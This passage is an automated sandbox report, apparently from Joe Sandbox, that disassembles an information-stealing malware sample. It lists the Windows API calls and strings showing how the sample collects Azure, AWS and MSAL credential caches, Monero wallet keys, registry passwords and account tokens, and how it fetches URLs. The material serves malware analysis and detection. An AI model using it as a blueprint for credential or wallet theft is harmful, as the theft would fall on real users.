Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 74818215aa3b0730b78498743529c867842f5461291b184a6eeb5919fc626419
Instruction ID: 00a55d34d97a4d6a124487ec0a06e39843390da17a1240ae3564fec50edc72a3
Opcode Fuzzy Hash: 74818215aa3b0730b78498743529c867842f5461291b184a6eeb5919fc626419
Instruction Fuzzy Hash: C441A87A94031867DB15F770DC87FED773CAB25704F004458B685AA0C2EEB46BC99B92

Function 003A1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003A12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003A12B4
Part of subcall function 003A12A0: RtlAllocateHeap.NTDLL(00000000), ref: 003A12BB
Part of subcall function 003A12A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003A12D7
Part of subcall function 003A12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003A12F5
Part of subcall function 003A12A0: RegCloseKey.ADVAPI32(?), ref: 003A12FF

lstrcat.KERNEL32(?,00000000), ref: 003A134F
lstrlen.KERNEL32(?), ref: 003A135C
lstrcat.KERNEL32(?,.keys), ref: 003A1377

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003B8B60: GetSystemTime.KERNEL32(003C0E1A,00F3CC78,003C05AE,?,?,003A13F9,?,0000001A,003C0E1A,00000000,?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003B8B86

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 003A1465

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Part of subcall function 003A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003A99EC
Part of subcall function 003A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003A9A11
Part of subcall function 003A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003A9A31
Part of subcall function 003A99C0: ReadFile.KERNEL32(000000FF,?,00000000,003A148F,00000000), ref: 003A9A5A
Part of subcall function 003A99C0: LocalFree.KERNEL32(003A148F), ref: 003A9A90
Part of subcall function 003A99C0: CloseHandle.KERNEL32(000000FF), ref: 003A9A9A

DeleteFileA.KERNEL32(00000000), ref: 003A14EF

Strings

wallet_path, xrefs: 003A1330
.keys, xrefs: 003A136B
\Monero\wallet.keys, xrefs: 003A138D
SOFTWARE\monero-project\monero-core, xrefs: 003A1335

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 9246c2a1d3dc8907bcb1cc631e8c59d7770620b91c12182fb12d762f1248ebba
Instruction ID: 168359796b7963bf821bf540a9edee707175adc08ea167a957e2efef20986bd7
Opcode Fuzzy Hash: 9246c2a1d3dc8907bcb1cc631e8c59d7770620b91c12182fb12d762f1248ebba
Instruction Fuzzy Hash: CD5157B1D5051867CB16FB60DC92FED737C9F54304F404198B70AAA481EF306B89CBA5

Function 003B7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003B7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003B757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B7603
RtlAllocateHeap.NTDLL(00000000), ref: 003B760A
wsprintfA.USER32 ref: 003B7640

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Strings

<, xrefs: 003B764D, 003B7655, 003B761B, 003B7623
\, xrefs: 003B7560
:, xrefs: 003B755C
C, xrefs: 003B754C

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$<
API String ID: 1544550907-3176003352
Opcode ID: 7eedda11fa3c594c35ca0806855ca91f88c64ade4f68f1a3dbe12c74b7ec2357
Instruction ID: 3b49a22835c48461977d9dde9d2c1537f3b8aa5b83790db9b1a81cbd3addb808
Opcode Fuzzy Hash: 7eedda11fa3c594c35ca0806855ca91f88c64ade4f68f1a3dbe12c74b7ec2357
Instruction Fuzzy Hash: A141D6B1D04248ABDF11DFA4CC95BDEBBB8EF58704F100099F6096B680DB746A44CBA1

Function 003A75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003A72D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 003A733A
Part of subcall function 003A72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003A73B1
Part of subcall function 003A72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003A740D
Part of subcall function 003A72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 003A7452
Part of subcall function 003A72D0: HeapFree.KERNEL32(00000000), ref: 003A7459

lstrcat.KERNEL32(355A0020,003C17FC), ref: 003A7606
lstrcat.KERNEL32(355A0020,00000000), ref: 003A7648
lstrcat.KERNEL32(355A0020, : ), ref: 003A765A
lstrcat.KERNEL32(355A0020,00000000), ref: 003A768F
lstrcat.KERNEL32(355A0020,003C1804), ref: 003A76A0
lstrcat.KERNEL32(355A0020,00000000), ref: 003A76D3
lstrcat.KERNEL32(355A0020,003C1808), ref: 003A76ED
task.LIBCPMTD ref: 003A76FB

Strings

: , xrefs: 003A764E

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 8b6205a708ba9f4337b18c2b56e0da5ef6d224f060324c0efb5998cc578f6902
Instruction ID: 1b439019570d9717dd04c30f08d3f8f1bed7aefbe433aa799b6acc6066cabc44
Opcode Fuzzy Hash: 8b6205a708ba9f4337b18c2b56e0da5ef6d224f060324c0efb5998cc578f6902
Instruction Fuzzy Hash: 2F314F72D04149DFCB0AEBB4DCD5EEE7778EB96301B144118F102AB151DA34A94ADB51

Function 003A72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 003A733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003A73B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003A740D
GetProcessHeap.KERNEL32(00000000,?), ref: 003A7452
HeapFree.KERNEL32(00000000), ref: 003A7459
task.LIBCPMTD ref: 003A7555

Strings

Password, xrefs: 003A7401

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 34f85d38999138ad8f7a2db708941d64e65780239fb53cd751dc3565e9268653
Instruction ID: 42ed17952336291f1677a562f5e852fe64ac6432e3131df0f1fe8ee37b3dd422
Opcode Fuzzy Hash: 34f85d38999138ad8f7a2db708941d64e65780239fb53cd751dc3565e9268653
Instruction Fuzzy Hash: 12612AB5D041689BDB25DB50CC85BD9B7B8FF59300F0081E9E689AA141EB706BC9CFA1

Function 003ABA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

lstrlen.KERNEL32(00000000), ref: 003ABC9F

Part of subcall function 003B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003B8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 003ABCCD
lstrlen.KERNEL32(00000000), ref: 003ABDA5
lstrlen.KERNEL32(00000000), ref: 003ABDB9

Strings

AccountId, xrefs: 003ABCC4
AccountTokens, xrefs: 003ABABA
SELECT service, encrypted_token FROM token_service, xrefs: 003ABBEB
AccountTokens, xrefs: 003ABB49

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: d7245e6bd4bd4ff67e8ff2b10b2eab57fa43710bc705222e443d897ad58d1ad8
Instruction ID: 102f943a68b9e3698be2901fc40a1277b374011eefd4b7c0e054bb45760b21b5
Opcode Fuzzy Hash: d7245e6bd4bd4ff67e8ff2b10b2eab57fa43710bc705222e443d897ad58d1ad8
Instruction Fuzzy Hash: 46B18971910908ABDF16FBA0CC96EED777CAF54304F404158F606BA892EF346E49DB62

Function 003A4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003A4FCA
RtlAllocateHeap.NTDLL(00000000), ref: 003A4FD1
InternetOpenA.WININET(003C0DDF,00000000,00000000,00000000,00000000), ref: 003A4FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 003A5011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 003A5041
InternetCloseHandle.WININET(?), ref: 003A50B9
InternetCloseHandle.WININET(?), ref: 003A50C6

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
